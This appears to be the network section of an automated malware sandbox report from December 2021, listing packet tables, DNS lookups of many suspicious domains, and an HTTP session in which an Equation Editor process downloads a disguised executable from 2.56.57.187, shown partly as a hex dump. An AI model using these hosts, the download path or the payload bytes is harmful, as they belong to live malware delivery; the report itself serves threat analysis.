Dec 15, 2021 14:47:52.604547024 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.604574919 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.604581118 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.604614973 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.604621887 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.604652882 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.604665041 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.604692936 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.604700089 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.604732990 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.604752064 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.604773998 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.604799032 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.604811907 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.604842901 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.604877949 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.604881048 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.604927063 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.604942083 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.604969978 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.605009079 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.605010986 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.605050087 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.605089903 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.605112076 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.605119944 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.605123997 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.605130911 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.605144024 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.605170012 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.605225086 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.608800888 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.610348940 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.610768080 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.610812902 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.610846996 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.610878944 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.610908031 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.610910892 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.610925913 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.610938072 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.610945940 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.610965967 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.610981941 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.611011982 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.611016035 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.611047029 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.611049891 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.611056089 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.611099005 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.611498117 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.628945112 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.628989935 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.629025936 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.629065037 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.629103899 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.629112005 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.629144907 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.629148960 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.629154921 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.629158020 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.629187107 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.629193068 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.629224062 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.629228115 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.629265070 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.629265070 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.629303932 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.629307985 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.629342079 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.629344940 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.629380941 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.629380941 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.629421949 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.629424095 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.629462004 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.629465103 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.629499912 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.629502058 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.629542112 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.630083084 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.630515099 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.630553961 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.630587101 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.630589008 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.630600929 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.630634069 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.630846977 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:54.133836985 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:48:56.587866068 CET	49166	80	192.168.2.22	104.21.53.218
Dec 15, 2021 14:48:56.604237080 CET	80	49166	104.21.53.218	192.168.2.22
Dec 15, 2021 14:48:56.604361057 CET	49166	80	192.168.2.22	104.21.53.218
Dec 15, 2021 14:48:56.604588985 CET	49166	80	192.168.2.22	104.21.53.218
Dec 15, 2021 14:48:56.620804071 CET	80	49166	104.21.53.218	192.168.2.22
Dec 15, 2021 14:48:56.972049952 CET	80	49166	104.21.53.218	192.168.2.22
Dec 15, 2021 14:48:56.972099066 CET	80	49166	104.21.53.218	192.168.2.22
Dec 15, 2021 14:48:56.972126961 CET	80	49166	104.21.53.218	192.168.2.22
Dec 15, 2021 14:48:56.972340107 CET	49166	80	192.168.2.22	104.21.53.218
Dec 15, 2021 14:48:56.972384930 CET	49166	80	192.168.2.22	104.21.53.218
Dec 15, 2021 14:49:02.099864006 CET	49167	80	192.168.2.22	167.99.163.124
Dec 15, 2021 14:49:02.284786940 CET	80	49167	167.99.163.124	192.168.2.22
Dec 15, 2021 14:49:02.284868956 CET	49167	80	192.168.2.22	167.99.163.124
Dec 15, 2021 14:49:02.285063982 CET	49167	80	192.168.2.22	167.99.163.124
Dec 15, 2021 14:49:02.468296051 CET	80	49167	167.99.163.124	192.168.2.22
Dec 15, 2021 14:49:02.500628948 CET	80	49167	167.99.163.124	192.168.2.22
Dec 15, 2021 14:49:02.500993013 CET	49167	80	192.168.2.22	167.99.163.124
Dec 15, 2021 14:49:02.520607948 CET	80	49167	167.99.163.124	192.168.2.22
Dec 15, 2021 14:49:02.520874023 CET	49167	80	192.168.2.22	167.99.163.124
Dec 15, 2021 14:49:02.684346914 CET	80	49167	167.99.163.124	192.168.2.22
Dec 15, 2021 14:49:13.164796114 CET	49168	80	192.168.2.22	109.71.253.24
Dec 15, 2021 14:49:13.181756020 CET	80	49168	109.71.253.24	192.168.2.22
Dec 15, 2021 14:49:13.181899071 CET	49168	80	192.168.2.22	109.71.253.24
Dec 15, 2021 14:49:16.164092064 CET	49168	80	192.168.2.22	109.71.253.24
Dec 15, 2021 14:49:16.181406975 CET	80	49168	109.71.253.24	192.168.2.22
Dec 15, 2021 14:49:16.181566000 CET	49168	80	192.168.2.22	109.71.253.24
Dec 15, 2021 14:49:16.181895971 CET	49168	80	192.168.2.22	109.71.253.24
Dec 15, 2021 14:49:16.199107885 CET	80	49168	109.71.253.24	192.168.2.22
Dec 15, 2021 14:49:16.199150085 CET	80	49168	109.71.253.24	192.168.2.22
Dec 15, 2021 14:49:16.199178934 CET	80	49168	109.71.253.24	192.168.2.22
Dec 15, 2021 14:49:16.199398041 CET	49168	80	192.168.2.22	109.71.253.24
Dec 15, 2021 14:49:16.199507952 CET	49168	80	192.168.2.22	109.71.253.24
Dec 15, 2021 14:49:16.216655970 CET	80	49168	109.71.253.24	192.168.2.22
Dec 15, 2021 14:49:34.090867043 CET	49169	80	192.168.2.22	3.19.116.195
Dec 15, 2021 14:49:34.239077091 CET	80	49169	3.19.116.195	192.168.2.22
Dec 15, 2021 14:49:34.239223003 CET	49169	80	192.168.2.22	3.19.116.195
Dec 15, 2021 14:49:34.239461899 CET	49169	80	192.168.2.22	3.19.116.195
Dec 15, 2021 14:49:34.386904001 CET	80	49169	3.19.116.195	192.168.2.22
Dec 15, 2021 14:49:34.386954069 CET	80	49169	3.19.116.195	192.168.2.22
Dec 15, 2021 14:49:34.386982918 CET	80	49169	3.19.116.195	192.168.2.22
Dec 15, 2021 14:49:34.387459040 CET	49169	80	192.168.2.22	3.19.116.195
Dec 15, 2021 14:49:34.387558937 CET	49169	80	192.168.2.22	3.19.116.195
Dec 15, 2021 14:49:34.539141893 CET	80	49169	3.19.116.195	192.168.2.22
Dec 15, 2021 14:49:39.429227114 CET	49171	80	192.168.2.22	34.102.136.180
Dec 15, 2021 14:49:39.445338011 CET	80	49171	34.102.136.180	192.168.2.22
Dec 15, 2021 14:49:39.445456028 CET	49171	80	192.168.2.22	34.102.136.180
Dec 15, 2021 14:49:39.446408987 CET	49171	80	192.168.2.22	34.102.136.180
Dec 15, 2021 14:49:39.462402105 CET	80	49171	34.102.136.180	192.168.2.22
Dec 15, 2021 14:49:39.561285973 CET	80	49171	34.102.136.180	192.168.2.22
Dec 15, 2021 14:49:39.561342955 CET	80	49171	34.102.136.180	192.168.2.22
Dec 15, 2021 14:49:39.561563015 CET	49171	80	192.168.2.22	34.102.136.180
Dec 15, 2021 14:49:39.561741114 CET	49171	80	192.168.2.22	34.102.136.180
Dec 15, 2021 14:49:39.579780102 CET	80	49171	34.102.136.180	192.168.2.22
Dec 15, 2021 14:49:44.707221031 CET	49172	80	192.168.2.22	147.124.221.147
Dec 15, 2021 14:49:44.885516882 CET	80	49172	147.124.221.147	192.168.2.22
Dec 15, 2021 14:49:44.885740995 CET	49172	80	192.168.2.22	147.124.221.147
Dec 15, 2021 14:49:44.886116982 CET	49172	80	192.168.2.22	147.124.221.147
Dec 15, 2021 14:49:45.064341068 CET	80	49172	147.124.221.147	192.168.2.22
Dec 15, 2021 14:49:45.727921963 CET	80	49172	147.124.221.147	192.168.2.22
Dec 15, 2021 14:49:45.727976084 CET	80	49172	147.124.221.147	192.168.2.22
Dec 15, 2021 14:49:45.728214979 CET	49172	80	192.168.2.22	147.124.221.147
Dec 15, 2021 14:49:45.728274107 CET	49172	80	192.168.2.22	147.124.221.147
Dec 15, 2021 14:49:45.906519890 CET	80	49172	147.124.221.147	192.168.2.22
Dec 15, 2021 14:49:50.780864954 CET	49173	80	192.168.2.22	75.2.60.5
Dec 15, 2021 14:49:50.798722982 CET	80	49173	75.2.60.5	192.168.2.22
Dec 15, 2021 14:49:50.798882008 CET	49173	80	192.168.2.22	75.2.60.5
Dec 15, 2021 14:49:50.799089909 CET	49173	80	192.168.2.22	75.2.60.5
Dec 15, 2021 14:49:50.816989899 CET	80	49173	75.2.60.5	192.168.2.22
Dec 15, 2021 14:49:51.098380089 CET	80	49173	75.2.60.5	192.168.2.22
Dec 15, 2021 14:49:51.098409891 CET	80	49173	75.2.60.5	192.168.2.22
Dec 15, 2021 14:49:51.098800898 CET	49173	80	192.168.2.22	75.2.60.5
Dec 15, 2021 14:49:51.098855019 CET	49173	80	192.168.2.22	75.2.60.5
Dec 15, 2021 14:49:51.116714001 CET	80	49173	75.2.60.5	192.168.2.22
Dec 15, 2021 14:49:56.138467073 CET	49174	80	192.168.2.22	23.225.139.107
Dec 15, 2021 14:49:56.325022936 CET	80	49174	23.225.139.107	192.168.2.22
Dec 15, 2021 14:49:56.325179100 CET	49174	80	192.168.2.22	23.225.139.107
Dec 15, 2021 14:49:56.325464010 CET	49174	80	192.168.2.22	23.225.139.107
Dec 15, 2021 14:49:56.513045073 CET	80	49174	23.225.139.107	192.168.2.22
Dec 15, 2021 14:49:56.513098001 CET	80	49174	23.225.139.107	192.168.2.22
Dec 15, 2021 14:49:56.513326883 CET	49174	80	192.168.2.22	23.225.139.107
Dec 15, 2021 14:49:56.513387918 CET	49174	80	192.168.2.22	23.225.139.107
Dec 15, 2021 14:49:56.700061083 CET	80	49174	23.225.139.107	192.168.2.22

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 15, 2021 14:48:56.551686049 CET	52167	53	192.168.2.22	8.8.8.8
Dec 15, 2021 14:48:56.575304985 CET	53	52167	8.8.8.8	192.168.2.22
Dec 15, 2021 14:49:01.976232052 CET	50591	53	192.168.2.22	8.8.8.8
Dec 15, 2021 14:49:02.097723007 CET	53	50591	8.8.8.8	192.168.2.22
Dec 15, 2021 14:49:07.514422894 CET	57805	53	192.168.2.22	8.8.8.8
Dec 15, 2021 14:49:08.081695080 CET	53	57805	8.8.8.8	192.168.2.22
Dec 15, 2021 14:49:13.134751081 CET	59030	53	192.168.2.22	8.8.8.8
Dec 15, 2021 14:49:13.162944078 CET	53	59030	8.8.8.8	192.168.2.22
Dec 15, 2021 14:49:21.213771105 CET	59185	53	192.168.2.22	8.8.8.8
Dec 15, 2021 14:49:21.348707914 CET	53	59185	8.8.8.8	192.168.2.22
Dec 15, 2021 14:49:26.357397079 CET	55616	53	192.168.2.22	8.8.8.8
Dec 15, 2021 14:49:26.539596081 CET	53	55616	8.8.8.8	192.168.2.22
Dec 15, 2021 14:49:33.968390942 CET	49972	53	192.168.2.22	8.8.8.8
Dec 15, 2021 14:49:34.086786985 CET	53	49972	8.8.8.8	192.168.2.22
Dec 15, 2021 14:49:39.404400110 CET	51771	53	192.168.2.22	8.8.8.8
Dec 15, 2021 14:49:39.427392006 CET	53	51771	8.8.8.8	192.168.2.22
Dec 15, 2021 14:49:44.568641901 CET	59867	53	192.168.2.22	8.8.8.8
Dec 15, 2021 14:49:44.705205917 CET	53	59867	8.8.8.8	192.168.2.22
Dec 15, 2021 14:49:50.754750013 CET	50315	53	192.168.2.22	8.8.8.8
Dec 15, 2021 14:49:50.779658079 CET	53	50315	8.8.8.8	192.168.2.22
Dec 15, 2021 14:49:56.113661051 CET	50072	53	192.168.2.22	8.8.8.8
Dec 15, 2021 14:49:56.136511087 CET	53	50072	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Dec 15, 2021 14:48:56.551686049 CET	192.168.2.22	8.8.8.8	0x8eb8	Standard query (0)	www.ridvanyilmaz.com	A (IP address)	IN (0x0001)
Dec 15, 2021 14:49:01.976232052 CET	192.168.2.22	8.8.8.8	0xc18c	Standard query (0)	www.atlasconcretos.com	A (IP address)	IN (0x0001)
Dec 15, 2021 14:49:07.514422894 CET	192.168.2.22	8.8.8.8	0xfc43	Standard query (0)	www.daudcoffee.com	A (IP address)	IN (0x0001)
Dec 15, 2021 14:49:13.134751081 CET	192.168.2.22	8.8.8.8	0x9c63	Standard query (0)	www.digitize-vision.com	A (IP address)	IN (0x0001)
Dec 15, 2021 14:49:21.213771105 CET	192.168.2.22	8.8.8.8	0x9037	Standard query (0)	www.rdaniels2.com	A (IP address)	IN (0x0001)
Dec 15, 2021 14:49:26.357397079 CET	192.168.2.22	8.8.8.8	0xce43	Standard query (0)	www.sdoook.com	A (IP address)	IN (0x0001)
Dec 15, 2021 14:49:33.968390942 CET	192.168.2.22	8.8.8.8	0xb02b	Standard query (0)	www.bagways.com	A (IP address)	IN (0x0001)
Dec 15, 2021 14:49:39.404400110 CET	192.168.2.22	8.8.8.8	0x43f4	Standard query (0)	www.xn--growbb-fvab.com	A (IP address)	IN (0x0001)
Dec 15, 2021 14:49:44.568641901 CET	192.168.2.22	8.8.8.8	0x1d11	Standard query (0)	www.multidetoxhepatico.com	A (IP address)	IN (0x0001)
Dec 15, 2021 14:49:50.754750013 CET	192.168.2.22	8.8.8.8	0x1f97	Standard query (0)	www.ktieman.com	A (IP address)	IN (0x0001)
Dec 15, 2021 14:49:56.113661051 CET	192.168.2.22	8.8.8.8	0x1873	Standard query (0)	www.ff4c2myy0.xyz	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Dec 15, 2021 14:48:56.575304985 CET	8.8.8.8	192.168.2.22	0x8eb8	No error (0)	www.ridvanyilmaz.com		104.21.53.218	A (IP address)	IN (0x0001)
Dec 15, 2021 14:48:56.575304985 CET	8.8.8.8	192.168.2.22	0x8eb8	No error (0)	www.ridvanyilmaz.com		172.67.219.41	A (IP address)	IN (0x0001)
Dec 15, 2021 14:49:02.097723007 CET	8.8.8.8	192.168.2.22	0xc18c	No error (0)	www.atlasconcretos.com		167.99.163.124	A (IP address)	IN (0x0001)
Dec 15, 2021 14:49:08.081695080 CET	8.8.8.8	192.168.2.22	0xfc43	Server failure (2)	www.daudcoffee.com	none	none	A (IP address)	IN (0x0001)
Dec 15, 2021 14:49:13.162944078 CET	8.8.8.8	192.168.2.22	0x9c63	No error (0)	www.digitize-vision.com		109.71.253.24	A (IP address)	IN (0x0001)
Dec 15, 2021 14:49:21.348707914 CET	8.8.8.8	192.168.2.22	0x9037	Server failure (2)	www.rdaniels2.com	none	none	A (IP address)	IN (0x0001)
Dec 15, 2021 14:49:34.086786985 CET	8.8.8.8	192.168.2.22	0xb02b	No error (0)	www.bagways.com	traff-6.hugedomains.com		CNAME (Canonical name)	IN (0x0001)
Dec 15, 2021 14:49:34.086786985 CET	8.8.8.8	192.168.2.22	0xb02b	No error (0)	traff-6.hugedomains.com	hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com		CNAME (Canonical name)	IN (0x0001)
Dec 15, 2021 14:49:34.086786985 CET	8.8.8.8	192.168.2.22	0xb02b	No error (0)	hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com		3.19.116.195	A (IP address)	IN (0x0001)
Dec 15, 2021 14:49:34.086786985 CET	8.8.8.8	192.168.2.22	0xb02b	No error (0)	hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com		3.18.7.81	A (IP address)	IN (0x0001)
Dec 15, 2021 14:49:39.427392006 CET	8.8.8.8	192.168.2.22	0x43f4	No error (0)	www.xn--growbb-fvab.com	xn--growbb-fvab.com		CNAME (Canonical name)	IN (0x0001)
Dec 15, 2021 14:49:39.427392006 CET	8.8.8.8	192.168.2.22	0x43f4	No error (0)	xn--growbb-fvab.com		34.102.136.180	A (IP address)	IN (0x0001)
Dec 15, 2021 14:49:44.705205917 CET	8.8.8.8	192.168.2.22	0x1d11	No error (0)	www.multidetoxhepatico.com	multidetoxhepatico.com		CNAME (Canonical name)	IN (0x0001)
Dec 15, 2021 14:49:44.705205917 CET	8.8.8.8	192.168.2.22	0x1d11	No error (0)	multidetoxhepatico.com		147.124.221.147	A (IP address)	IN (0x0001)
Dec 15, 2021 14:49:50.779658079 CET	8.8.8.8	192.168.2.22	0x1f97	No error (0)	www.ktieman.com		75.2.60.5	A (IP address)	IN (0x0001)
Dec 15, 2021 14:49:56.136511087 CET	8.8.8.8	192.168.2.22	0x1873	No error (0)	www.ff4c2myy0.xyz	ff4c2myy0.xyz		CNAME (Canonical name)	IN (0x0001)
Dec 15, 2021 14:49:56.136511087 CET	8.8.8.8	192.168.2.22	0x1873	No error (0)	ff4c2myy0.xyz		23.225.139.107	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

2.56.57.187

www.ridvanyilmaz.com

www.atlasconcretos.com

www.digitize-vision.com

www.bagways.com

www.xn--growbb-fvab.com

www.multidetoxhepatico.com

www.ktieman.com

www.ff4c2myy0.xyz

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49165	2.56.57.187	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 15, 2021 14:47:52.165010929 CET	0	OUT	GET /LaXgQ8hib9fwKQI.bat HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 2.56.57.187 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	2.56.57.187	80	192.168.2.22	49165	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data
Dec 15, 2021 14:47:52.195635080 CET	1	IN	HTTP/1.1 200 OK Date: Wed, 15 Dec 2021 13:47:52 GMT Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.13 Last-Modified: Wed, 15 Dec 2021 05:29:13 GMT ETag: "fe400-5d32896180bf6" Accept-Ranges: bytes Content-Length: 1041408 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 26 7d b9 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 d8 0f 00 00 0a 00 00 00 00 00 00 ae f6 0f 00 00 20 00 00 00 00 10 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 10 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 58 f6 0f 00 53 00 00 00 00 00 10 00 80 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 10 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b4 d6 0f 00 00 20 00 00 00 d8 0f 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 80 06 00 00 00 00 10 00 00 08 00 00 00 da 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 10 00 00 02 00 00 00 e2 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 f6 0f 00 00 00 00 00 48 00 00 00 02 00 05 00 80 8a 0f 00 d8 6b 00 00 03 00 00 00 3e 00 00 06 68 ff 00 00 18 8b 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 02 00 01 00 00 00 01 00 00 11 2a 00 00 00 13 30 04 00 5b 00 00 00 01 00 00 11 02 14 7d 01 00 00 04 02 28 16 00 00 0a 20 08 a9 31 32 20 5e f5 35 26 61 25 0a 1a 5e 45 04 00 00 00 dc ff ff ff 22 00 00 00 02 00 00 00 12 00 00 00 2b 20 00 06 20 a9 04 94 23 5a 20 0b 09 08 5b 61 2b cf 00 06 20 89 97 33 6e 5a 20 a4 bc 41 05 61 2b bf 02 28 06 00 00 06 00 2a 00 13 30 04 00 58 01 00 00 01 00 00 11 02 14 7d 01 00 00 04 02 28 16 00 00 0a 20 f0 cb b1 5b 20 61 de 1f 0f 61 25 0a 1f 0c 5e 45 0c 00 00 00 e1 00 00 00 b6 00 00 00 26 00 00 00 05 00 00 00 5c 00 00 00 80 00 00 00 c9 00 00 00 bb ff ff ff 49 00 00 00 04 01 00 00 36 00 00 00 a3 00 00 00 38 ff 00 00 00 02 7b 0a 00 00 04 0e 04 28 17 00 00 0a 6f 18 00 00 0a 06 20 50 b4 16 32 5a 20 18 41 5b 92 61 2b 9a 00 06 20 aa 8d 05 b0 5a 20 16 4f 3a cc 61 2b 8a 00 06 20 95 eb dc 34 5a 20 4b c6 b6 2a 61 38 77 ff ff ff 00 06 20 7f 5c bd f9 5a 20 2f d9 57 33 61 38 64 ff ff ff 02 7b 07 00 00 04 03 28 17 00 00 0a 6f 18 00 00 0a 00 06 20 1f 88 02 05 5a 20 b0 b4 a2 ce 61 38 40 ff ff ff 02 7b 08 00 00 04 04 28 17 00 00 0a 6f 18 00 00 0a 06 20 dc b6 02 2e 5a 20 fe b4 e7 ed 61 38 1d ff ff ff 00 06 20 18 22 9b 99 5a 20 21 c4 17 4e 61 38 0a ff ff ff 00 06 20 e1 6e bf 84 5a 20 90 7c 05 28 61 38 f7 fe ff ff Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL&}a @ @@XS H.text `.rsrc@@.reloc @BHk>h00[}( 12 ^5&a%^E"+ #Z [a+ 3nZ Aa+(0X}( [ aa%^E&\I68{(o P2Z A[a+ Z O:a+ 4Z K*a8w \Z /W3a8d{(o Z a8@{(o .Z a8 "Z !Na8 nZ \|(a8
Dec 15, 2021 14:47:52.195692062 CET	3	IN	Data Raw: 02 28 06 00 00 06 06 20 86 70 ba 6b 5a 20 e3 e0 2e f4 61 38 df fe ff ff 02 7b 09 00 00 04 05 28 17 00 00 0a 6f 18 00 00 0a 06 20 89 d2 26 ae 5a 20 7b 05 5a 68 61 38 bc fe ff ff 00 2a 1b 30 04 00 b6 01 00 00 02 00 00 11 00 72 01 00 00 70 73 19 00 Data Ascii: ( pkZ .a8{(o &Z {Zha8*0rps{o(o wa%^EP=d8 zZ ca+{o(o Z &ba+ Z a
Dec 15, 2021 14:47:52.195755959 CET	4	IN	Data Raw: 8a 61 38 d2 fd ff ff 00 06 20 22 f6 d6 f0 5a 20 48 fe 7c 91 61 38 bf fd ff ff 00 06 20 90 1d aa 90 5a 20 4d a2 80 06 61 38 ac fd ff ff 02 7b 07 00 00 04 1a 8d 47 00 00 01 25 16 1c 9e 73 21 00 00 0a 6f 22 00 00 0a 00 02 7b 07 00 00 04 72 25 00 00 Data Ascii: a8 "Z H\|a8 Z Ma8{G%s!o"{r%po# /Z 5a8o F~Z (ka8\ ;?Z ViDa8Is$}s$}s$} _&Z _a8{ s%o& MZ 0Ba8('
